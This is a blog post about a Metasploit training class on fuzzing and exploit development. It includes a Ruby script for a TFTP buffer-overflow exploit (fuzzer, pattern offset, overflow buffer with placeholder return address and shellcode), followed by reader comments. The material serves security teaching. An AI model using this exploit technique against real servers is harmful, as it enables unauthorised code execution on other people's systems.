Friday, January 7, 2011

Fuzzing and Exploit Development with Metasploit - Louisville Metasploit Class

Originally posted on: TUESDAY, MAY 4, 2010 AT 5:17PM

On May 8th the Kentucky ISSA held a training session in Louisville, KY. I was asked to teach the section on fuzzing and exploit development. Having only an hour to cover this VERY complex topic, I demonstrated a basic buffer overflow: we start with fuzzing and go through the basic steps of exploit development. This is an old, well-known exploit, but it demonstrates the important principles. Feel free to follow along with the videos and post any questions in the comments section.

Talk: Video

Slides: Download

Download Immunity DBG - Go To Immunity

Download Files - Here

Copy the simple_fuzzer.rb file to %MSFROOT%/modules/auxiliary/fuzzers/tftp/

Copy the tftp32-* files to %MSFROOT%/modules/exploits/windows/priv/

Note: In BackTrack %MSFROOT% is /pentest/exploits/framework3

Note: You will need to create the tftp and priv folders.

Part One - Fuzzing with Metasploit

Part Two - Finding EIP

Part Three - Build the Exploit

Part Four - Find EIP Offset

Part Five - Add and Test EIP Overwrite

Part Six - Add Shellcode
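The six parts above are the steps of one procedure, so here is a single worked example of the mechanics in plain Ruby (the language Metasploit modules are written in). It is an added example, not the simple_fuzzer.rb or tftp32-* code from the class, and it runs without the framework. It assumes an x86 TFTP server that crashes when the filename in a Read Request is too long (the generic case the videos work through); the return address 0xdeadbeef and the 0xCC placeholder shellcode are hypothetical stand-ins for a "jmp esp" you would read out of Immunity Debugger and for a payload you would generate separately.

```ruby
# Added example (not code from the original post or its tftp32-* modules):
# the fuzz -> find EIP -> find offset -> overwrite EIP -> add shellcode
# steps in plain Ruby, without the Metasploit framework.

# A TFTP Read Request (RFC 1350): opcode 1, filename, NUL, mode, NUL.
# Note the filename is NUL-terminated, so the overflow must avoid 0x00.
def tftp_rrq(filename, mode = "octet")
  [1, filename, mode].pack("nZ*Z*")
end

# Part One - fuzzing: RRQs whose filename grows by `step` bytes each time.
# Send each one to the target and watch the debugger for the crash.
def fuzz_cases(start = 100, step = 100, max = 1000)
  (start..max).step(step).map { |n| tftp_rrq("A" * n) }
end

# Part Four - a cyclic pattern in which every 4-byte window is unique
# (the same Aa0Aa1... scheme as Metasploit's pattern_create).
def pattern_create(length)
  out = String.new # binary, mutable
  ("A".."Z").each do |u|
    ("a".."z").each do |l|
      ("0".."9").each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Given the EIP the debugger shows after sending the pattern (an x86
# little-endian dword), return how far into the filename those bytes sat.
# nil means EIP was not overwritten by the pattern at all.
def pattern_offset(pattern, eip)
  pattern.index([eip].pack("V"))
end

# Parts Five and Six - the exploit buffer: junk up to the offset, the
# return address (a "jmp esp" found in the debugger; 0xdeadbeef below is a
# hypothetical stand-in), a short NOP sled, shellcode, then padding so the
# request stays the same length that crashed the server.
def build_overflow(offset, ret_addr, shellcode, total = 1000)
  buf = ("A" * offset).b
  buf << [ret_addr].pack("V")
  buf << ("\x90" * 16).b
  buf << shellcode.b
  buf << ("C" * (total - buf.length)).b if buf.length < total
  buf
end

if $PROGRAM_NAME == __FILE__
  pattern = pattern_create(1000)
  # Pretend the debugger showed this EIP after the pattern request crashed
  # the server (constructed here from the pattern at byte 300).
  crash_eip = pattern[300, 4].unpack1("V")
  offset = pattern_offset(pattern, crash_eip)
  puts "EIP 0x%08x is at pattern offset %d" % [crash_eip, offset]
  # Placeholder shellcode: int3 breakpoints, so the debugger stops if the
  # return address really lands on the sled. Swap in a real payload later.
  exploit = tftp_rrq(build_overflow(offset, 0xdeadbeef, "\xCC" * 8))
  puts "exploit request: %d bytes" % exploit.length
end
```

In the class the crash EIP comes from the debugger, not from the pattern itself; the script constructs one only so the round trip from pattern to offset can be checked offline. The pattern_offset result is the value you feed into build_overflow, and the fact that the filename is NUL-terminated is why the return address and shellcode must not contain 0x00 bytes.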


  1. Hi NullThreat,

    Unable to access files & slides @

    Access Denied. So could you please share it again?

  2. Infosec,

    The links seem to be working. If you are still having trouble, email me at nullthreat(AT)gmail(DOT)com

  3. Have you tried creating a fuzzer for webs?

  4. Hey, I just finished watching this (actually got it as one big AVI off Crenshaw's site) and this is some really, really great stuff. Can you point me in the right direction to get good at this quickly?

    I'm looking to:
    (*) Learn shellcoding
    (*) Learn to use a debugger in this capacity
    (*) Learn all those fun little tricks besides the really basic exploit you showed that everybody kept teasing you for
    (*) Learn what I'm supposed to be asking to learn.

    I've got a working knowledge of assembler from core war and some programming experience, but no network programming experience, so that's probably something I should look into as well.

    Thanks in advance

  5. Very nice tutorials on fuzzing, keep posting; we have a lack of documentation about fuzzing when it comes to direct application.